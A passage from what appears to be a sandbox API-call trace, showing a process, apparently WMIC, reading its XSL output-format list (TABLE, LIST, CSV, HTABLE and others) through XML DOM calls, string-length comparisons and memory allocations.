listLength=0x10fbe8 | out: listLength=0x10fbe8*=21) returned 0x0 [0050.249] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=0, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.249] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="texttable.xsl") returned 0x0 [0050.249] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.249] malloc (_Size=0x18) returned 0x266d30 [0050.250] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.250] free (_Block=0x266d30) [0050.250] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0050.250] malloc (_Size=0x18) returned 0x266d30 [0050.250] malloc (_Size=0x18) returned 0x266d50 [0050.250] malloc (_Size=0x30) returned 0x268080 [0050.250] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.250] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.250] IUnknown:Release (This=0x217a280) returned 0x0 [0050.250] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=1, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.250] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="textvaluelist.xsl") returned 0x0 [0050.250] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.250] malloc (_Size=0x18) returned 0x266e70 [0050.250] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.250] free (_Block=0x266e70) [0050.250] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0050.251] malloc (_Size=0x18) returned 0x26c270 [0050.251] malloc (_Size=0x18) returned 0x26c290 [0050.251] SysStringLen (param_1="VALUE") returned 0x5 [0050.251] SysStringLen (param_1="TABLE") returned 0x5 [0050.251] SysStringLen (param_1="TABLE") returned 0x5 [0050.251] SysStringLen (param_1="VALUE") returned 0x5 [0050.251] malloc (_Size=0x30) returned 0x2680c0 [0050.251] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.251] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.251] IUnknown:Release (This=0x217a280) returned 0x0 [0050.251] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=2, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.251] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="textvaluelist.xsl") returned 0x0 [0050.251] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.251] malloc (_Size=0x18) returned 0x26c2b0 [0050.251] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.251] free (_Block=0x26c2b0) [0050.251] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0050.251] malloc (_Size=0x18) returned 0x26c2b0 [0050.252] malloc (_Size=0x18) returned 0x26c2d0 [0050.252] SysStringLen (param_1="LIST") returned 0x4 [0050.252] SysStringLen (param_1="TABLE") returned 0x5 [0050.252] malloc (_Size=0x30) returned 0x268100 [0050.252] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.252] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.252] IUnknown:Release (This=0x217a280) returned 0x0 [0050.252] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=3, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.252] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="rawxml.xsl") returned 0x0 [0050.252] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.252] malloc (_Size=0x18) returned 0x26c2f0 [0050.252] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.252] free (_Block=0x26c2f0) [0050.252] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0050.252] malloc (_Size=0x18) returned 0x26c2f0 [0050.252] malloc (_Size=0x18) returned 0x26c310 [0050.252] SysStringLen (param_1="RAWXML") returned 0x6 [0050.252] SysStringLen (param_1="TABLE") returned 0x5 [0050.252] SysStringLen (param_1="RAWXML") returned 0x6 [0050.252] SysStringLen (param_1="LIST") returned 0x4 [0050.253] SysStringLen (param_1="LIST") returned 0x4 [0050.253] SysStringLen (param_1="RAWXML") returned 0x6 [0050.253] malloc (_Size=0x30) returned 0x268140 [0050.253] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.253] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.253] IUnknown:Release (This=0x217a280) returned 0x0 [0050.253] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=4, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.253] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="htable.xsl") returned 0x0 [0050.253] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.253] malloc (_Size=0x18) returned 0x26c330 [0050.253] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.253] free (_Block=0x26c330) [0050.253] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0050.253] malloc (_Size=0x18) returned 0x26c330 [0050.253] malloc (_Size=0x18) returned 0x26c350 [0050.253] SysStringLen (param_1="HTABLE") returned 0x6 [0050.253] SysStringLen (param_1="TABLE") returned 0x5 [0050.253] SysStringLen (param_1="HTABLE") returned 0x6 [0050.253] SysStringLen (param_1="LIST") returned 0x4 [0050.253] malloc (_Size=0x30) returned 0x268180 [0050.253] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.253] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.253] IUnknown:Release (This=0x217a280) returned 0x0 [0050.253] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=5, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.253] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="hform.xsl") returned 0x0 [0050.253] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.253] malloc (_Size=0x18) returned 0x26c370 [0050.254] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.254] free (_Block=0x26c370) [0050.254] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0050.254] malloc (_Size=0x18) returned 0x26c370 [0050.254] malloc (_Size=0x18) returned 0x26c390 [0050.254] SysStringLen (param_1="HFORM") returned 0x5 [0050.254] SysStringLen (param_1="TABLE") returned 0x5 [0050.254] SysStringLen (param_1="HFORM") returned 0x5 [0050.254] SysStringLen (param_1="LIST") returned 0x4 [0050.254] SysStringLen (param_1="HFORM") returned 0x5 [0050.254] SysStringLen (param_1="HTABLE") returned 0x6 [0050.254] malloc (_Size=0x30) returned 0x2681c0 [0050.254] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.254] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.254] IUnknown:Release (This=0x217a280) returned 0x0 [0050.254] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=6, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.254] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="xml.xsl") returned 0x0 [0050.254] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.254] malloc (_Size=0x18) returned 0x26c3b0 [0050.254] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.254] free (_Block=0x26c3b0) [0050.254] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0050.254] malloc (_Size=0x18) returned 0x26c3b0 [0050.254] malloc (_Size=0x18) returned 0x26c3d0 [0050.254] SysStringLen (param_1="XML") returned 0x3 [0050.254] SysStringLen (param_1="TABLE") returned 0x5 [0050.255] SysStringLen (param_1="XML") returned 0x3 [0050.255] SysStringLen (param_1="VALUE") returned 0x5 [0050.255] SysStringLen (param_1="VALUE") returned 0x5 [0050.255] SysStringLen (param_1="XML") returned 0x3 [0050.255] malloc (_Size=0x30) returned 0x268200 [0050.255] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.255] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.255] IUnknown:Release (This=0x217a280) returned 0x0 [0050.255] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=7, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.255] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="mof.xsl") returned 0x0 [0050.255] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.255] malloc (_Size=0x18) returned 0x26c3f0 [0050.255] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.255] free (_Block=0x26c3f0) [0050.255] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0050.255] malloc (_Size=0x18) returned 0x26c3f0 [0050.255] malloc (_Size=0x18) returned 0x26c410 [0050.255] SysStringLen (param_1="MOF") returned 0x3 [0050.255] SysStringLen (param_1="TABLE") returned 0x5 [0050.255] SysStringLen (param_1="MOF") returned 0x3 [0050.255] SysStringLen (param_1="LIST") returned 0x4 [0050.255] SysStringLen (param_1="MOF") returned 0x3 [0050.255] SysStringLen (param_1="RAWXML") returned 0x6 [0050.255] SysStringLen (param_1="LIST") returned 0x4 [0050.255] SysStringLen (param_1="MOF") returned 0x3 [0050.255] malloc (_Size=0x30) returned 0x268240 [0050.255] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.255] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.255] IUnknown:Release (This=0x217a280) returned 0x0 [0050.255] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=8, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.256] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="csv.xsl") returned 0x0 [0050.256] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.256] malloc (_Size=0x18) returned 0x26c430 [0050.256] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.256] free (_Block=0x26c430) [0050.256] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0050.256] malloc (_Size=0x18) returned 0x26c430 [0050.256] malloc (_Size=0x18) returned 0x26c450 [0050.256] SysStringLen (param_1="CSV") returned 0x3 [0050.256] SysStringLen (param_1="TABLE") returned 0x5 [0050.256] SysStringLen (param_1="CSV") returned 0x3 [0050.256] SysStringLen (param_1="LIST") returned 0x4 [0050.256] SysStringLen (param_1="CSV") returned 0x3 [0050.256] SysStringLen (param_1="HTABLE") returned 0x6 [0050.256] SysStringLen (param_1="CSV") returned 0x3 [0050.256] SysStringLen (param_1="HFORM") returned 0x5 [0050.256] malloc (_Size=0x30) returned 0x268280 [0050.256] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.256] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.256] IUnknown:Release (This=0x217a280) returned 0x0 [0050.256] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=9, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.256] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="texttable.xsl") returned 0x0 [0050.256] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.256] malloc (_Size=0x18) returned 0x26c470 [0050.256] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.257] free (_Block=0x26c470) [0050.257] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0050.257] malloc (_Size=0x18) returned 0x26c470 [0050.257] malloc (_Size=0x18) returned 0x26c490 [0050.257] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.257] SysStringLen (param_1="TABLE") returned 0x5 [0050.257] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.257] SysStringLen (param_1="VALUE") returned 0x5 [0050.257] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.257] SysStringLen (param_1="XML") returned 0x3 [0050.257] SysStringLen (param_1="XML") returned 0x3 [0050.257] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.257] malloc (_Size=0x30) returned 0x2682c0 [0050.257] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.257] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.257] IUnknown:Release (This=0x217a280) returned 0x0 [0050.257] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=10, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.257] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="texttable.xsl") returned 0x0 [0050.257] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.257] malloc (_Size=0x18) returned 0x26c4b0 [0050.257] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.257] free (_Block=0x26c4b0) [0050.257] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0050.257] malloc (_Size=0x18) returned 0x26c4b0 [0050.257] malloc (_Size=0x18) returned 0x26c4d0 [0050.257] SysStringLen (param_1="texttablewsys") returned 0xd [0050.257] SysStringLen (param_1="TABLE") returned 0x5 [0050.258] SysStringLen (param_1="texttablewsys") returned 0xd [0050.258] SysStringLen (param_1="XML") returned 0x3 [0050.258] SysStringLen (param_1="texttablewsys") returned 0xd [0050.258] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.258] SysStringLen (param_1="XML") returned 0x3 [0050.258] SysStringLen (param_1="texttablewsys") returned 0xd [0050.258] malloc (_Size=0x30) returned 0x268300 [0050.258] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.258] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.258] IUnknown:Release (This=0x217a280) returned 0x0 [0050.258] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=11, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.258] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="texttable.xsl") returned 0x0 [0050.258] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.258] malloc (_Size=0x18) returned 0x26c4f0 [0050.258] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.258] free (_Block=0x26c4f0) [0050.258] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0050.258] malloc (_Size=0x18) returned 0x26c4f0 [0050.258] malloc (_Size=0x18) returned 0x26c510 [0050.258] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.258] SysStringLen (param_1="TABLE") returned 0x5 [0050.258] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.258] SysStringLen (param_1="XML") returned 0x3 [0050.258] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.258] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.258] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.258] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.258] malloc (_Size=0x30) returned 0x268340 [0050.258] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.258] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.258] IUnknown:Release (This=0x217a280) returned 0x0 [0050.259] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=12, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.259] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="texttable.xsl") returned 0x0 [0050.259] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.259] malloc (_Size=0x18) returned 0x26c530 [0050.259] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.259] free (_Block=0x26c530) [0050.259] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0050.259] malloc (_Size=0x18) returned 0x26c530 [0050.259] malloc (_Size=0x18) returned 0x26c550 [0050.259] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.259] SysStringLen (param_1="TABLE") returned 0x5 [0050.259] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.259] SysStringLen (param_1="XML") returned 0x3 [0050.259] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.259] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.259] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.259] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.259] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.259] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.259] malloc (_Size=0x30) returned 0x268380 [0050.259] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.259] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.259] IUnknown:Release (This=0x217a280) returned 0x0 [0050.259] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=13, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.259] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="texttable.xsl") returned 0x0 [0050.259] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.259] malloc (_Size=0x18) returned 0x26c570 [0050.259] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.260] free (_Block=0x26c570) [0050.260] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0050.260] malloc (_Size=0x18) returned 0x26c570 [0050.260] malloc (_Size=0x18) returned 0x26c590 [0050.260] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.260] SysStringLen (param_1="TABLE") returned 0x5 [0050.260] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.260] SysStringLen (param_1="XML") returned 0x3 [0050.260] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.260] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.260] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.260] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.260] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.260] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.260] malloc (_Size=0x30) returned 0x2683c0 [0050.260] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.260] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.260] IUnknown:Release (This=0x217a280) returned 0x0 [0050.260] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=14, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.260] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="texttable.xsl") returned 0x0 [0050.260] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.260] malloc (_Size=0x18) returned 0x26c5b0 [0050.260] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.260] free (_Block=0x26c5b0) [0050.260] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0050.260] malloc (_Size=0x18) returned 0x26c5b0 [0050.260] malloc (_Size=0x18) returned 0x26c5d0 [0050.261] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.261] SysStringLen (param_1="TABLE") returned 0x5 [0050.261] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.261] SysStringLen (param_1="XML") returned 0x3 [0050.261] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.261] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.261] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.261] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.261] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.261] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.261] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.261] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.261] malloc (_Size=0x30) returned 0x268400 [0050.261] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.261] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.261] IUnknown:Release (This=0x217a280) returned 0x0 [0050.261] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=15, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.261] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="htable.xsl") returned 0x0 [0050.261] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.261] malloc (_Size=0x18) returned 0x26c5f0 [0050.261] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.261] free (_Block=0x26c5f0) [0050.261] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0050.261] malloc (_Size=0x18) returned 0x26c5f0 [0050.261] malloc (_Size=0x18) returned 0x26c610 [0050.261] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.261] SysStringLen (param_1="TABLE") returned 0x5 [0050.261] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.261] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.261] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.261] SysStringLen (param_1="XML") returned 0x3 [0050.262] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.262] SysStringLen (param_1="texttablewsys") returned 0xd [0050.262] SysStringLen (param_1="XML") returned 0x3 [0050.262] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.262] malloc (_Size=0x30) returned 0x268440 [0050.262] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.262] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.262] IUnknown:Release (This=0x217a280) returned 0x0 [0050.262] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=16, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.262] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="htable.xsl") returned 0x0 [0050.262] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.262] malloc (_Size=0x18) returned 0x26c630 [0050.262] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.262] free (_Block=0x26c630) [0050.262] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0050.262] malloc (_Size=0x18) returned 0x26c630 [0050.262] malloc (_Size=0x18) returned 0x26c650 [0050.262] SysStringLen (param_1="htable-sortby") returned 0xd [0050.262] SysStringLen (param_1="TABLE") returned 0x5 [0050.262] SysStringLen (param_1="htable-sortby") returned 0xd [0050.262] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.262] SysStringLen (param_1="htable-sortby") returned 0xd [0050.262] SysStringLen (param_1="XML") returned 0x3 [0050.262] SysStringLen (param_1="htable-sortby") returned 0xd [0050.262] SysStringLen (param_1="texttablewsys") returned 0xd [0050.262] SysStringLen (param_1="htable-sortby") returned 0xd [0050.262] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.262] SysStringLen (param_1="XML") returned 0x3 [0050.262] SysStringLen (param_1="htable-sortby") returned 0xd [0050.262] malloc (_Size=0x30) returned 0x268480 